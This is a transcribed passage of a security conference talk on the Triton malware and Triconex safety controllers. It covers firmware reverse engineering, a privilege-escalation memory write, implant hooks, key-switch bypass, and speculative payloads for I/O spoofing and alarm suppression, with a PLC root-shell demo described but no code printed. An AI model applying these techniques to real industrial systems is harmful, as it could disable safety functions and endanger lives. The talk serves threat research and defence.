like shooting fish in a barrel right um and before tridon it was
basically the same thing it wasn't executed my packet police vulnerability so the vulnerability was a freebie of the protocol reverse engineering you have this safety program download functionality which is how the engineers put like the actual logic on the thing and it has no authentication and the safety logic that gets downloaded to the device has no secure signing right so you can basically skip all the way from reverse engineering to exploit development and that's neat from an attacker point of view not too neat from a defender front of you and then that
brings us to exploit development so after we find a suitable vulnerability and we get our code execution we need to craft an exploit to to actually you know not execute just the logic we won but execute you know the instructions and the microcontroller we want and how would this look like in the case of Triton well Triton has safety and
control applications which are developed in one of these icy languages many of them look like graphical language like you can see on the bottom of the slide and they typically get compiled and downloaded and executed on the main processor there and that's nice because that gives you another exploit development freebie because you don't need to break out of any sand boxes you don't need to exploit any runtimes and because in the case of the Tri context controller the logic was executed on the same chip that the operating system was executed on you don't need to hop across any chip perimeters you're right where you want to be so tridon did have to add some additional functionality so it doesn't overwrite the original programming but it depends to it and the reason why it did this is because it allows the safety of logic to continue running without interruption because once you're implanting this device you don't want everything to stop and potentially already cause a process shutdown you want to be stealthy at least at that point another complication is the key
switch on the try connects controllers so these devices have a physical key switch that allows you to to set it to a certain mode and only if it's set into the programming mode then you can actually download new logic to it and this is something that will be relevant later when we discuss the payloads
another complication of embedded exploitation in general is the heterogeneity and so embedded devices are far more heterogeneous and general-purpose once you deal with a billion architectures from arm 2 to MIPS to PowerPC to do whatever a billion kind of operating systems like vxworks orc unix or even custom operating systems and in the case of tri connects that means that you have different architectures and operating systems between different versions so version 9 had a national semiconductor chip version 10 and 11 had PowerPC and for the attacker this means that scaling the attack requires writing and modifying payloads and implants for each different version so there's some effort involved there and that brings us to the
development of the implant and the OT payload and you know that's that's this that's the stage that's close to what marina mentioned of mapping like that TSD to the implants on the devices and then we get to this stage now we have
code execution we can run arbitrary PowerPC shell code so now what well exploitation is just one step among many so for complicated ot payloads we will need to develop this implant and then after that craft the OT payload we have different kind of strategies here so we can directly implant the OT payload straight away after exploiting device or we can implement a backdoor which would allow us to keep the the OT payload secret until you know zero hour and basically provides you with Killswitch capabilities or in the jargon of some people at dormant cyber pathogen that basically would allow you at a later stage to execute any kind of payload you'd want to the second thing we'll have to decide on is whether we'd go for cross boot persistence which would require modifying the flash and we need enough space there to insert the implant or which is what Triton did we just go fully memory resident that requires executable Ram but it does mean that on reboot the implant is gone now for safety controls this is not that relevant because these have an extremely high uptime so even if it would be gone upon reboot you know it's probably gonna be there all the time anyway this has the added benefit for the attacker that it does complicate forensics the the other thing you want to think about when designing an implant is the scalability of the implant so you want to target devices that are common throughout ICS so not only for one particular facility you might be interested in but across different kind of facilities different kind of industries and tri connects fits this bill so there are 18 thousand or more than 80 thousand try connect systems in over 80 countries so having these kind of capabilities is very interesting from a strategic point of view you also want to target if you're targeting software instead of controllers you want to target the software that is common throughout ICS so used across multiple vendors so protocol and connectivity stacks are usually reused by multiple vendors so you know having exploits for that kind of stuff really scales well and the same goes for control runtimes or or the operating systems in question you basically want to construct an arsenal of exploits and implants against common devices and software stacks because that means that it is a one-time upfront investment and now there is no huge turnover in these devices these these have an extremely long field life they get deployed for 10 20 years they don't get updated very often you know if there are even updates out there so if you invest once in an arsenal for let's say all safety controllers that are relevant in the market right now it's gonna be an investment that's gonna be paying off for a long time so Triton makes more sense as a tool in such an arsenal than a very expensive one-off that was engineered for this particular attack so that brings us to the reverse engineering of the ICS firmer now the first thing you'll have to do is extracting the firmware so you have to determine the firmware format and then unpack sometimes there will be firmers from multiple chips on the board or data blobs and they're glued together and you'll have to get them out of the firmware and then you'll have to do the compression and the decryption if there is any of that present this might be simple you know keys might be present in a firmer loading utility or you might have to actually do side-channel attacks in the case of tri connects this was very easy because the firmware was unencrypted so you know basically this step could be skipped the stuff that you
do after that is pre-processing the firmware so you need to obtain a memory map you need to know where on this chip does the ROM live where does the RAM live or does the external memory live this purpose registers for interacting with peripherals all that kind of stuff and you typically get this from the datasheet so very important if you do this kind of stuff you need to learn the law of reading data sheets [Music] so after you know basically the lay the lay of the land here and you go about
identifying the base address so you need to know where this particular former image is loaded into memory there are many approaches here and this is a gross oversimplification but we simply don't have the time to go into all the details but this can be as simple as you know being loaded at the chip fixed address you can reverse engineer the update utility and see where it places it or you can extract it from something like the interrupt vector table or the bootloader or self relocating coding code jump table string tables all that let's consider for example this rtu
firmware piece this is a piece of firmware for a remote terminal unit that's deployed somewhere in the field its ARM based and we have this piece of firmware and we don't know what the base address is so we load it just at address 0 and then we see all these these different basically branches does anyone recognize what this is a couple of people well yeah that's the interrupt vector table of an of an ARM chip so the first the first entry is a branch to the reset handler and basically if we look
at the offset we have 100 as an offset
here and here we have 102 if we look at that offset we see a lot of toggling with like these these special purpose registers and that's very typical behavior of a reset handler so if we
then deduct the the thousand basically that becomes the base address we rebase the firmware image and we can see that
it cleans up nicely now we know how to load it into memory so after you've done
this you know where to load it you know where everything is laid out you have to reconstruct the complete code and data topology of the firmware firmware images are not need executable formats like like PE or Alf or Mac oh I mean your mileage might vary for what qualifies as a neat executable format but this definitely is not it we will have to you Rishta cailli identify the functions in there the strings to jump tables the structs and all that kind of stuff on the upside this is this is usually the bulk of the work doing all this reverse engineering the upside is that we don't need to reverse engineer the full front only up until readiness for this next step because we want to hunt
interesting functionality we want to reverse engineering a sniper like fashion so we want to know how how does the control runtime work that actually interprets and handles this this safety logic where are the protocol parsers where are the communications and peripheral i/o handlers whereas any security or safety related functionality there so what would this look like for
the try connects 308 which was targeted by the triton attack
well it's firmware that's powerpc-based which is nice because the hex rays the compiler is available for that and that saves you a lot of work it's not a substitute for reading the disassembly but it eases your navigation across this firmware it uses a custom operating system with 27 system calls and some sparse documentation exists Thank You NRC basically this is what the operating
system looks like you have a scan task a communications task and a background task and we're really only interested in the scan task which fetches inputs from shared memory which is where all the analog and digital i/o gets put then we do a try bus transfer for the voting on consistency and then we run the actual control logic and then we send the outputs again 2d to the shared memory and basically this implements all these control loops so the targets here would
have been the memory layout and management because we want you know to achieve this memory residency so we need to know how to do that and then we need to look for consistency checks and diagnostics functionality for implant stability we don't want anything messing with our implant power wall running we need to know where the network command dispatcher functionality is because we want to be able to communicate with it over the network and achieve that we want to be able to know if there's any privileged mode management we want to do anything we can on this device so if there is privileged management we want to escalate them yeah so and possibly finally we need to know the scan tasks and an i/o transfer stuff so that's
basically what the triton implant looks
like and does so it has four stages it has an argument setter an implant installer the backdoor implant and then a missing OT payload so the argument
setter it's not that interesting but it basically controls the the thinit state machine of this thing which does at first if you can see that properly it does an exploit for prevalence escalation and then basically it relocates the the implant the third stage so the
privilege escalation exploit it looks complicated but it's not it's basically a right for anywhere because of improper handling of memory privileges that allows you to write this address to this at this value to this address what does this mean basically what happens is that once you invoke a system call on this particular firmware it saves the Machine State register and when it returns it restores it and it is stored at this particular address that anyone can write to regardless of privileges so if we override it with this value we set a bit 17-2 supervisor privileges and escalate it and that allows us to do these next steps to install the implant the first of which is copying the payload into the firmware area of memory which allows us to achieve residents even if they wipe all the safety logic on the controller then we patch an entry in the jump table which allows us to to hook a network command and then invoke our implant when this particular network command is is called and then finally we patch a
certain RAM check which was used for consistency between the firmware and ROM and in RAM which would otherwise mess with our stuff and this is basically the
backdoor implant like marina mentioned it allows for reading writing and executing arbitrary memory and basically allows you to overwrite this this key
switch so once you implant it it doesn't matter what what position they turn the key switch into it allows you to execute anything you want in memory so we have persistence on this device so the fourth stage which is which is the most engineering related is the OT payload and this was missing because this carries out the meet of the attack and we can only speculate what this might have looked like and that's something we'll do so because Triton is positioned here in the ad attack tree that the control and safety system this is what the OT payload would have been related to so basically it could have been for
example an i/o spoofing scenario and that would have been a scenario that marina would have given to me and said you know we want to do spoofing of input and output values as you can see
for example here you have measurement values they come as an input signal to the controller and as an output signal go to the instrumentation and then we want to mess with either the input or the output to cause some unsafe State now internally this looks like this on
these devices so you have the physical i/o you have logic and there is an intermediary variable table that manages this and the Tri connects this is
handled by an i/o processor that has shared memory connection to the main microcontroller and that's where it places this variable table so we didn't
have a track connection controller but we did have a Wargo PLC and I mean it basically comes down to the same thing it's an ARM Cortex PLC running real-time Linux it has a vulnerability in the codesys runtime on TCP that you can explode remotely and gain route and basically what we do in our attack is we use the CPU debug registers to catch any access to this memory mapped i/o and then we write a custom exception handler that gets invoked when this this debug trap is invoked and we change the pin mode for example from output to input so any writes that would be have been going to an actuator like closing a valve are now going to an input pin and they don't actually go out and we have a little demo of this that should be coming up
well we don't have a lot of time but all right so what you can see here is you have the WAGO PLC on the right and then you have let which is are standing for you know both valve and it's supposed to be blinking every couple of seconds and now you can see it yeah now you can see basically on the engineering software and the attacker will soon yeah I can really skip anything here but [Music] there should pop up like a shell at some point now you can see the LED blinking there [Music] all right yeah so you know this is a root shell on the PLC we execute our payload which is basically a line external module that does this thing I just mentioned about the CPU debug registers and then we stop it and you can see the lab will stop blinking while it should be consistently blinking because it you know it now thinks it's an input pin and then at some point you know we'll change it back again to an output pin and then you can see it's starting blinking again right if this was a valve it would have been haven't had an impact now it's a let and you know it's just a demo so that brings us to the second
possible payload which is alarm suppression so let's say we want to mass
for example with with a chemical process like this and our goal is catalyst deactivation now industrial processes they have alarm so if something is about to go into an unsafe State or something is out of bounds an alarm is raised somewhere in the process and these are propagated tribe the process and eventually lead to a safety shutdown and as an attacker we want to prevent this because we want the attack to continue so how do we go about this we can hide
the alarms by compromising like the safety view or the dcs view or some local HMIS and this is the benefit of you know hiding them centrally but still these alarms go out as network traffic right and we don't want any kind of network inspection to see these alarms
so we want to suppress them either at the field level the level of the field devices or at the level of the safety controller itself which is what tri can access so for tri can actually have
safety view which is a pc-based HMI solution that allows for management and bypasses of all these alarms and each HMI function is mapped to a tri connects logic function block and that looks
somewhat that was a little bit too quick
that looks something like this so you have for example a water tank level alarm here you have a water high water low signal and an aura of them raises an alarm so as an attacker these these safety programs reside in memory as code which is how we got you know execution in the first place so the OT payload here could modify the instructions to set the alarm to affixed falls regardless of the water levels that are coming as inputs to this alarm function the attacker needs to know of course first where the program lives in memory and which instructions of the program to manage modify now luckily for
tri connects these programs are stored as a circular linked list in memory as you can see here this is actually our implant living in memory and then you can walk this link list and find the target program you want to modify and
this is what basically the the alarm looks like the decor of the logic is a simple or instruction which the attacker can then you know hop batch you know it's it's it's PowerPC it's a RISC architecture with a fixed instruction size so we just set it to a fixed false there it's relatively easy and this is
the result that comes out of it on the left you have normal functionality you know water is getting dangerously high the alarms going off on the right you have the exploited functionality water is getting dangerously high alarm sleeping alright so some more
speculation why did this attack fail I don't think we mentioned that but the attack was discovered because it failed in the in the actual field it costs a safety shutdown of the process there are
a couple of possibilities you could have had abort payload and you know the privilege escalation could have failed it could have target a different firmware version than they actually had developed the exploit for which could have caused an access violation I mean the backdoor allows for raw reading writing and executing of memory they could have cost some memory corruption by an and you know a payload that was written wrongly they could have gotten into a fight with the watchdog so very common on embedded systems you have this watchdog timer and you need to periodically kick it to to keep the counter high because if the counter expires it resets the CPU or it could have missed some additional Diagnostics I mean there's a ton of Diagnostics functionality in here and just because they patched the RAM and ROM check doesn't mean that they patched everything rightly these are all options and our option is that they got into a
fight with the triple modular redundancy I mean this this is just the folding on the inputs and the output but it's a very complicated patent that has a lot that covers a lot of ground and it could have been that the OT payload violated something in the triple modular redundancy that in turn led to a safety shutdown that brings us to the
conclusions which I'll give to marina again probably have just like a couple of minutes for conclusions so just to
summarize like so I mean again the purpose was also to go through this process of development implants for the better system and see whether it is really that complicated so what is the actual real threat is it also only for elite and we should not expect this type of attack or implants on a mass scale or it not and apparently it is not not only that exploitation and implanting of industrial control systems relatively easy like it's cheap because there is no any exploit mitigations but also obtaining equipment relatively easy we went through the process obtaining documentation is relatively easy so you kind of have all of the needed components to quickly obtain code execution and be able to backdoor this type of devices so exploit development again easy if I will just go quickly through this implant development relatively easy so for example the case of Triton the attack already had privileges typically on industrial control system you would not have pre like separation of privileges so the attacker had privileges to escalate his privileges need so however for example in case in safety system you typically have this triple like redundancy sometimes it's quadruple redundancy which makes things a little bit complicated because you have to reverse-engineer more so the most difficult part which we were able to establish is actually developing OTP laws so basically my task is harder and especially whenever we come together like for example Yas and I come together this is my wish lift and he already has an implant this is where reverse engineering started get going further and that is becoming more difficult so so basically so the open questions which we have and this is I think yours has covered it very nicely that it's probably just what we've seen is just one tool among many so basically development costs should be seen as relatively low and I think we should what we definitely should expect relatively soon is copy kept at security is a fashionable industry so as soon as you like for example somebody will release the first ransomware man where everybody will be designer and somewhere malware so this is what we're going probably to see so many more other like state-sponsored threat actors will join this basically game and again it's not necessarily so this is what like people's in on one hand yes it's easy to explore then why don't we see a lot of those attacks because first of all you have to have a motive why would you do that and secondly it's of course like crossing this red line so in one hand it probably will be something like the nuclear weapons you will have the air Sanel and maybe you will be showing the capabilities just in a slight mayor manner like it has happened with power grid attacks in Ukraine you just show that you are capable of but you do not cause massive like damage which hurts so you basically will be having it is alike economical and political negotiation so we wanted to sense a couple of people including Felix Linda he was like a frequent Def Con speaker who kindly helped us to review the slides we have the slides with the toolkit which you will need and with
that we at the end and thank you very much for your attention [Applause]
Feedback